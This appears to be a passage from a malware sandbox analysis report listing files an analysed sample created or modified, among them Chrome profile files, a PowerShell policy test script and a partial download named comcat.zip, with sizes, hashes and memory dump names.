23098e7200bc44e571f7e4786bf51b3dfd701976

SHA256
d8569a9f88eab7ad3ac308ddf9b37c4e64a7d0e6be61361e76d3cdfe36fc8357

SHA512
be148f45951d34d9c409faf03ea173ba3e0cef62ef1d74d2d251426ff126370fc8dada4f3f83cac638e4549c85b80b697b061c660ebc538ee14441259e4931f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
4865523dfbe62a2d17bdbcc426d6deba

SHA1
c6e849ffef3035d7e069923652f90c68f686206d

SHA256
5d511999212f1e6d398dd54480ab00f7ac2b53006d7925d2c515c429f9fc9c6d

SHA512
5fbe07cb1566867356fa796987ce8011e9333c7f1647bb61796672da514eb2084db54f07e47ba08fbd39e72eccfde7fbd60991c79733a5a5c7e724ca6e189499

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
02a6a1c61bfa6e93d283d2fd8d1b644c

SHA1
2314fbf2050785d3c42a8343399e5e2c55903a8c

SHA256
49e56b069aa83e2223353bb0d08959560077f58e21a9bdddc2e9ffe8c49775db

SHA512
9481801190f6901178260352cddb4204f3b6c52941dd0b46fbb0c4bf1629dcce4a36291af46cb711c5be9475ae6b2c49f5f34ebd031fa84cf8f64580c6875c12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57dbba.TMP

Filesize
48B

MD5
35894ab6e3a6102ce3fe510e2306f5c5

SHA1
31a0e3fbf2bb986013b42fb873554ed98a4c4f43

SHA256
c7fd6072ceb29ad31471692f340a02ce1716ae02f64080df53812336cf142863

SHA512
050921dab1566f00312746b936134ad2ec76fda92fccc5b96beb6459b0686cddd01d9d3dd973cdf16cafcf9d57e8389db981a06bc2b2da0c10410b8650040a14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
e90d6798c46d9a483cad37116be38fa3

SHA1
f72dddae7da2ec9267b68237551c128e00051c51

SHA256
9bcc0915ae17758706b8f94c68938f93a0d1ba10117ee6b9569e6aad9b15bb35

SHA512
a66d504d5beb66505effc9dd2bdb6d972c01225172fd84c60ffa2ff8059bfa75ea5c998e607c58c2d6a9ed73124284e4ebb735e0d89a5d206d9b6402a64547b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
9296c566264393bae22fe42a4071e9ea

SHA1
e9c7cfc4e06ba5fbf1915a0fad8861b057efa9c0

SHA256
62353197d6d1344c11154cfedb00e33c9831d79a0be2595cf6a4946d68cea1a3

SHA512
21a621ce91813884815f612f73e207af956d691ffc0c4196a8acd00c3115227bc6feecd83c19852207c33506f60d900a46f3a900bcc2b0fdfa76842cf255b24c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
81KB

MD5
2e0237aa359bb5b7b133aac13d43b1fc

SHA1
3ffb3d6989a7f58f00c697c9fc4b0154f04218b5

SHA256
f12f39214916494a44b367d59c66b532170901385c611c5a1662f8fdda384da0

SHA512
92c5d1b8111499aeb51598efe75f679d31a32ecc342e4aeac26216d0963db0c95ee9b29b246c7698b50d47c67504161a29a2041dd3a610793a4dda6d416be4d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuuxkuuu.xqf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\comcat.zip.crdownload

Filesize
3.7MB

MD5
a931850be10516b7357eda47ff30712d

SHA1
651ac4fcafb2a73dee0ad70c0c97f1d648723b98

SHA256
12b15788820107bd87654629df386c64cd15e7125bdb8de2c647c8e63dc319a5

SHA512
b8c614c03a4b3dd66681ace00ec963b2fe1281c27c721702f181ec2f3b5c140626570d01d1d7df9edf255569bf18896d902269ef7e8ee555193cff904922be41

Download Submit
memory/456-222-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/456-261-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/3996-159-0x00000163E7020000-0x00000163E7042000-memory.dmp

Filesize
136KB

Download